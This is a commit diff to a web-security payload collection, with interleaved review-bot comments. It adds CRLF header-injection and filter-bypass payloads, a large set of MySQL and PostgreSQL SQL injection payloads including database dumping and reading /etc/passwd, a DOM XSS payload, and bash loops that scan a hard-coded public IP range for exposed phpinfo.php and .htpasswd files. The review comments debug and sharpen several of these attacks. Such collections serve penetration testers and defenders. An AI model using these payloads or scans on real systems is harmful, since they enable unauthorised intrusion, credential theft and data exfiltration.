Enumeration added and improvement for CRLF/XSS/SQL
This commit is contained in:
parent
341295dc4b
commit
c73124a79d
@ -26,7 +26,7 @@ x-xss-protection: 1; mode=block
|
|||||||
## CRLF - Write HTML
|
## CRLF - Write HTML
|
||||||
Requested page
|
Requested page
|
||||||
```
|
```
|
||||||
http://www.example.net/index.php?lang=en%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
|
http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
|
||||||
```
|
```
|
||||||
|
|
||||||
HTTP response
|
HTTP response
|
||||||
@ -41,5 +41,20 @@ Content-Length: 34
|
|||||||
|
|
||||||
<html>You have been Phished</html>```
|
<html>You have been Phished</html>```
|
||||||
|
|
||||||
|
|
||||||
|
## CRLF - Filter Bypass
|
||||||
|
Using UTF-8 encoding
|
||||||
|
```
|
||||||
|
%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
|
||||||
|
```
|
||||||
|
Remainder:
|
||||||
|
* %E5%98%8A = %0A = \u560a
|
||||||
|
* %E5%98%8D = %0D = \u560d
|
||||||
|
* %E5%98%BE = %3E = \u563e (>)
|
||||||
|
* %E5%98%BC = %3C = \u563c (<)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
* https://www.owasp.org/index.php/CRLF_Injection
|
* https://www.owasp.org/index.php/CRLF_Injection
|
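Review bot: The updated request at the top of the first hunk converts only the first line break to `%0D%0A`; every later header separator in the same payload (`Content-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0A...`) still uses a bare `%0A`, so against a server that only honours CRLF as a header terminator the injected response block will not parse even though the first header now does. Make the encoding consistent across the whole example, e.g. `...lang=en%0D%0AContent-Length%3A%200%0D%0A%20%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type%3A%20text/html%0D%0A...`, and say in the "Requested page" text that a bare `%0A` is only worth trying against lenient parsers. As written, a reader who copies the line will conclude the target is not vulnerable when the test simply never produced a well-formed second response.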
27
Enumeration_and_fingerprinting.md
Normal file
27
Enumeration_and_fingerprinting.md
Normal file
@ -0,0 +1,27 @@
|
|||||||
|
# Collection of usefull scripts and tricks
|
||||||
|
|
||||||
|
## Dorks
|
||||||
|
|
||||||
|
Google Dork to find subdomains
|
||||||
|
```
|
||||||
|
site:*.domain.com -www
|
||||||
|
```
|
||||||
|
|
||||||
|
## Scripts
|
||||||
|
Script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
|
||||||
|
```
|
||||||
|
#!/bin/bash
|
||||||
|
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
|
||||||
|
wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
|
||||||
|
```
|
||||||
|
|
||||||
|
Script to detect all .htpasswd files in a range of IPs
|
||||||
|
```
|
||||||
|
#!/bin/bash
|
||||||
|
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
|
||||||
|
wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Thanks to
|
||||||
|
* http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/
|
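Review bot: The two scanning loops in this new file call `wget` without checking its result, so "detect" means hand-inspecting whatever landed in the working directory: every hit is saved as `phpinfo.php`, `phpinfo.php.1`, ... (likewise `.htpasswd`) and misses are only visible in wget's stderr. Redirecting the body away and keying on the exit status gives a clean host list instead, e.g. `wget -q -t 1 -T 3 -O /dev/null "http://${ipa}/phpinfo.php" && echo "${ipa}"` (wget exits non-zero on a 4xx/5xx response), and `${ipa}` should be quoted as shown. The address range `98.13{6..9}.{0..255}.{0..255}` is hard-coded — presumably the range from the referenced write-up — and expands to 262,144 hosts fetched one at a time, so a comment should tell the reader to substitute the target's range (the "CIDR can be found with a whois" sentence implies this but the script does not) and that the trailing `&` only backgrounds the loop, it does not parallelise it. A one-line note that these are to be run only against systems the reader is authorised to test belongs above the scripts.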
27
README.md
27
README.md
@ -1,16 +1,17 @@
|
|||||||
# Payloads All The Things
|
# Payloads All The Things
|
||||||
A list of usefull payloads and bypasses for Web Application Security
|
A list of usefull payloads and bypasses for Web Application Security
|
||||||
Feel free to improve with your payloads (I <3 pull requests) :)
|
Feel free to improve with your payloads and techniques !
|
||||||
|
I <3 pull requests :)
|
||||||
|
|
||||||
To improve:
|
Last modifications :
|
||||||
* RCE
|
* XSS paylods improved
|
||||||
* SQL injection
|
* CRLF payloads improved
|
||||||
* XXE
|
* SQLi payloads improved
|
||||||
* SSRF
|
* Enumeration added (WIP)
|
||||||
* Upload
|
|
||||||
* Tar command exec
|
TODO : Basic methodology for hunting bugs and vulnerabilities
|
||||||
* Traversal Directory
|
|
||||||
* XSS
|
# More resources
|
||||||
* PHP Include
|
Book's list:
|
||||||
* CSV Injection
|
* Web Hacking 101 - https://leanpub.com/web-hacking-101
|
||||||
* PHP Serialization
|
* The Web Application Hacker's Handbook - https://www.amazon.fr/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470
|
||||||
|
@ -1,7 +1,7 @@
|
|||||||
# SQL injection
|
# SQL injection
|
||||||
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
||||||
|
|
||||||
## Exploit
|
## Authentication bypass and Entry point detection
|
||||||
|
|
||||||
Detection of an SQL injection entry point
|
Detection of an SQL injection entry point
|
||||||
```
|
```
|
||||||
@ -30,14 +30,50 @@ SELECT id FROM users WHERE username='' or true-- AND password='input2'
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
MySQL Error Based
|
# MYSQL
|
||||||
|
MySQL Union Based
|
||||||
|
```
|
||||||
|
gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
||||||
|
gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
||||||
|
gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
|
||||||
|
gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
MySQL Error Based - Basic
|
||||||
```
|
```
|
||||||
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
||||||
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
||||||
```
|
```
|
||||||
|
|
||||||
|
MYSQL Error Based - UpdateXML function
|
||||||
|
```
|
||||||
|
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
|
||||||
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
|
||||||
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--
|
||||||
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)),null)--
|
||||||
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
|
||||||
|
```
|
||||||
|
|
||||||
MySQL Blind SQL
|
MYSQL Error Based - Extractvalue function
|
||||||
|
```
|
||||||
|
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
||||||
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
||||||
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
|
||||||
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--
|
||||||
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
||||||
|
```
|
||||||
|
|
||||||
|
MySQL Blind with MAKE_SET
|
||||||
|
```
|
||||||
|
MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
||||||
|
MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
|
||||||
|
MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
|
||||||
|
MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
MySQL Time Based
|
||||||
```
|
```
|
||||||
+BENCHMARK(40000000,SHA1(1337))+
|
+BENCHMARK(40000000,SHA1(1337))+
|
||||||
```
|
```
|
||||||
@ -48,6 +84,24 @@ MySQL Read content of a file
|
|||||||
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
||||||
```
|
```
|
||||||
|
|
||||||
|
MySQL DIOS - Dump in One Shot
|
||||||
|
```
|
||||||
|
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
|
||||||
|
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
# POSTGRESQL
|
||||||
|
|
||||||
|
PostgreSQL Error Based - Basic
|
||||||
|
```
|
||||||
|
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
|
||||||
|
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||||
|
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||||
|
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
|
||||||
|
```
|
||||||
|
|
||||||
|
# Other usefull payloads
|
||||||
|
|
||||||
Polyglot injection (multicontext)
|
Polyglot injection (multicontext)
|
||||||
```
|
```
|
||||||
|
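Review bot: The first UpdateXML payload in the new MYSQL error-based block ends with a single `-` (`...version(),CHAR(126)),null)-`) instead of the `--` every sibling line uses, so the remainder of the host query is not commented out and the payload will usually raise a syntax error rather than leak the version; it should read `AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)--`. The placeholders scattered through the added blocks (`data_offset`, `data_column`, `data_table`, `data_info`, `YOLO`, `POS`) are never defined, and `table_schema=data_column` in the TABLES queries actually takes a database name, so a short legend above the MYSQL heading — e.g. `data_table`/`data_column` = target table/column, `data_offset` = row index, `YOLO` = value being compared, `POS` = character position — would save readers a wrong first attempt. Note also that MySQL only treats `--` as a comment when it is followed by whitespace, so a trailing space or `-- -` is the safer terminator on all of these lines.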
@ -83,6 +83,11 @@ XSS in Hidden input
|
|||||||
Use CTRL+SHIFT+X to trigger the onclick event
|
Use CTRL+SHIFT+X to trigger the onclick event
|
||||||
```
|
```
|
||||||
|
|
||||||
|
DOM XSS
|
||||||
|
```
|
||||||
|
#"><img src=/ onerror=alert(2)>
|
||||||
|
```
|
||||||
|
|
||||||
## XSS in wrappers javascript and data
|
## XSS in wrappers javascript and data
|
||||||
XSS with javascript:
|
XSS with javascript:
|
||||||
```
|
```
|
||||||
|
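Review bot: The new `DOM XSS` entry gives no hint of which sink it targets: the leading `#` shows the payload is meant to travel in the URL fragment, which only fires when client-side code copies `location.hash` (or `document.URL`) into an HTML-interpreting sink such as `innerHTML` or `document.write`, and since the fragment is never sent to the server it also bypasses server-side filters and leaves no trace in server logs. A line above the code block would make the entry usable, e.g. `Payload placed in the URL fragment; works when client-side code writes location.hash into innerHTML/document.write (the fragment never reaches the server, so server-side filters and logs do not see it).` The `">` prefix assumes the value lands inside a quoted attribute; mention that a text-node sink needs only `<img src=/ onerror=alert(2)>`.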